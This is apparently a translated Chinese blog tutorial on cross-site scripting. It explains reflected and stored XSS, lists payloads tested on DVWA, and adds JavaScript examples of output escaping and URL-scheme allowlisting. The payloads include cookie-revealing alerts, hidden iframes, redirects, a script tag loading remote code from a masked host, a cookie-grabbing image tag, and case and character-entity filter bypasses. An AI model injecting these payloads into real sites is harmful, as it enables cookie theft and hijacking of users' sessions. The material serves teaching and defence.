XSS: Cross-Site Scripting Attacks

XSS Introduction

XSS stands for cross-site scripting; it is abbreviated XSS rather than CSS to avoid confusion with Cascading Style Sheets.
XSS is one of the most frequently found security vulnerabilities in web applications and one of the most widespread kinds of web attack.
XSS means that an attacker exploits a site's failure to escape or filter user-submitted data and gets their own code embedded in the web page. When other users visit the page, the embedded code runs in their browsers, which lets the attacker steal their information, perform actions under their identity, or attack visitors with malware.

The harm done by XSS attacks includes:
1. Theft of user accounts of all kinds, such as machine login accounts, online banking accounts and the various administrator accounts.
2. Control over corporate data, including reading, tampering with, adding and deleting sensitive data.
3. Illegal transfers, planting malware on the site (a "hung horse" site), forced sending of email, and using the victim's machine to attack other sites.

Main categories of XSS

Reflected XSS, also known as non-persistent cross-site scripting, is the most common type of XSS. The vulnerability arises because data injected by the attacker is reflected back in the response. A typical non-persistent XSS attack is delivered as a link that carries the XSS attack vector, so each attack requires the user to click the link.

Stored XSS, also known as persistent cross-site scripting, generally occurs when the XSS attack vector (the XSS attack code) is saved in the site's database, so the stored script executes whenever a user opens the affected page. Persistent XSS is more dangerous than non-persistent XSS because the script runs automatically every time a user opens the page and views its content.
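To make the two categories concrete, here is an added example (not code from the original post) showing a reflected and a stored rendering path, each in a vulnerable form and beside it the form that encodes user data for the HTML text context. The request object and the in-memory comment array are assumed stand-ins for a real web framework and database; it runs offline in Node.js.

```javascript
// Added example, not code from the original post: reflected and stored XSS,
// each with a vulnerable rendering path and the escaped one beside it.
// Runs offline in Node.js. `sampleQuery` and `comments` are constructed
// stand-ins for a framework request object and a database table.

// Encode the characters that have meaning in an HTML text or attribute
// context, so user data is displayed as text instead of parsed as markup.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected XSS: the query parameter goes straight back into the response.
// The attacker's link carries the payload; it runs only for whoever clicks it.
function renderSearchVulnerable(query) {
  return '<p>You searched for: ' + query.search + '</p>';
}

// Same page, hardened by encoding the value for the HTML text context.
function renderSearchSafe(query) {
  return '<p>You searched for: ' + escapeHtml(query.search) + '</p>';
}

// Stored XSS: the payload is saved once and then served to every visitor.
function storeComment(store, text) {
  store.push(text); // a real application would write this to its database
  return store.length;
}

function renderCommentsVulnerable(store) {
  return '<ul>' + store.map((c) => '<li>' + c + '</li>').join('') + '</ul>';
}

function renderCommentsSafe(store) {
  return '<ul>' + store.map((c) => '<li>' + escapeHtml(c) + '</li>').join('') + '</ul>';
}

// Check used only for the demonstration: does the HTML still contain an
// unencoded <script> start tag that a browser would execute?
function hasRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the same popup payload the post runs on DVWA.
const payload = "<script>alert('xss')</script>";
const sampleQuery = { search: payload };
const comments = [];
storeComment(comments, 'first comment');
storeComment(comments, payload);

console.log('reflected, vulnerable:', renderSearchVulnerable(sampleQuery));
console.log('reflected, safe:      ', renderSearchSafe(sampleQuery));
console.log('stored, vulnerable:   ', renderCommentsVulnerable(comments));
console.log('stored, safe:         ', renderCommentsSafe(comments));
```

The point of the two safe variants is that the fix is applied at output time, in the context where the data lands: the stored comment is still saved exactly as submitted, but every visitor receives it as `&lt;script&gt;...` and the browser shows text instead of running it.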

XSS script structure

1. Common HTML tags (listed as an image in the original post)
2. Commonly used JavaScript methods (listed as an image in the original post)
3. Constructing XSS scripts
Pop-up warning
This script pops up an alert box and is generally used for vulnerability testing or demonstration, much like the single quote used when testing for SQL injection. If the script executes even once, it means the back-end server does not filter the special characters <, > and /, which proves that this location on the page has an XSS vulnerability. I wrote it out and ran it on DVWA; the results are shown below.

<script>alert('xss')</script>
<script>alert(document.cookie)</script>

The first one ran successfully and popped up a window saying xss.
The second one displays the cookie when run.
Page nesting

<iframe src=https://zxcv0221.github.io width=300 height=300></iframe>
<iframe src=https://zxcv0221.github.io width=0 height=0 border=0></iframe>

The first one, when run, embeds my GitHub blog in the page.
The second one, hmm, sets the nested page size to 0, so nothing visibly changes.
Page redirects

<script>window.location="https://zxcv0221.github.io"</script>
<script>location.href="https://zxcv0221.github.io"</script>

The first one, of course, still loads my blog home page.
The second one produces the same result as the first.

Pop-up warning and redirect

<script>alert("欢迎来到我的博客网站");location.href="https://zxcv0221.github.io"</script>

This pops up a window and then loads my blog page.
After clicking OK here, it redirects to my blog.
Loading malicious code from a remote server

<script src="http://*********/xss.js"></script>

Don't bother looking; I don't actually have that file, but it is still worth seeing.
Using the image tag

<img src="#" onerror=alert('xss')>/* Think about what advantage this has compared with the <script> tag above. Heh. */
<img src="javascript:alert('xss');">/* This can also pop up a window */
<img src="http://**********.***">/* You can point this at whatever site you want to direct users to and obtain the user's cookie; which image to use and the image parameters are up to you. */

Bypassing filters
Case variation: <ScrIpT>alert('xss')</ScRipt>
Character encoding, such as URL encoding or base64 encoding; the example below uses HTML numeric character references:

<a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;">小弹窗</a>

The second one, when run, produces a hyperlink.
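The bypasses above all work against filters that look for a fixed string. As an added example (not code from the original post), the block below shows a constructed blocklist filter of that kind failing on the case variant and the img handler, and beside it an allowlist check for href/src values that decodes HTML character references before reading the URL scheme, which is what catches the encoded javascript: link. `naiveFilter`, the sample names and the relative URL are assumptions for the demonstration; it runs offline in Node.js.

```javascript
// Added example, not code from the original post: why matching the literal
// string "<script>" misses the bypasses shown above, and an allowlist check
// for URL attributes that decodes entities first. Runs offline in Node.js.
// naiveFilter is a constructed stand-in for the blocklists these bypasses target.

// Blocklist filter: removes one lower-case <script> pair and nothing else.
function naiveFilter(input) {
  return input.replace('<script>', '').replace('</script>', '');
}

// Decode numeric character references (&#106; / &#x6A;) and the named
// entities that commonly appear inside attribute values.
function decodeEntities(s) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return named[body.toLowerCase()] || match;
  });
}

// Allowlist check for a URL attribute value. Browsers decode entities and
// drop tabs, newlines and leading/trailing control characters before they
// read the scheme, so the check normalises the same way and then accepts
// only http, https or scheme-less (relative) URLs.
function isSafeUrl(raw) {
  const url = decodeEntities(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true; // relative URL: no scheme at all
  const scheme = m[1].toLowerCase();
  return scheme === 'http' || scheme === 'https';
}

// Constructed samples: the bypass forms the post shows, plus benign values.
const tagSamples = {
  caseVariant: "<ScrIpT>alert('xss')</ScRipt>",
  imgHandler: '<img src="#" onerror=alert(\'xss\')>',
};
const hrefSamples = {
  entityHref: '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;',
  blogHref: 'https://zxcv0221.github.io',
  relativeHref: '/search?q=xss', // assumed relative path for the demonstration
};

for (const [name, value] of Object.entries(tagSamples)) {
  console.log(name, '| unchanged by naive filter:', naiveFilter(value) === value);
}
for (const [name, value] of Object.entries(hrefSamples)) {
  console.log(name, '| decodes to:', decodeEntities(value), '| allowed as URL:', isSafeUrl(value));
}
```

Two things are worth noticing in the output: the case variant and the img tag pass through `naiveFilter` untouched, so a blocklist cannot be the control, and `decodeEntities` turns the entity-encoded href into a plain javascript: URL, which is why the scheme check has to run on the decoded value rather than on the raw attribute text.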
All of the above are reflected XSS.
Stored XSS is the more dangerous type; its risk is far greater than that of reflected XSS.
OK, stopping here.
I'm off now.



Origin blog.csdn.net/qq_45836474/article/details/104910481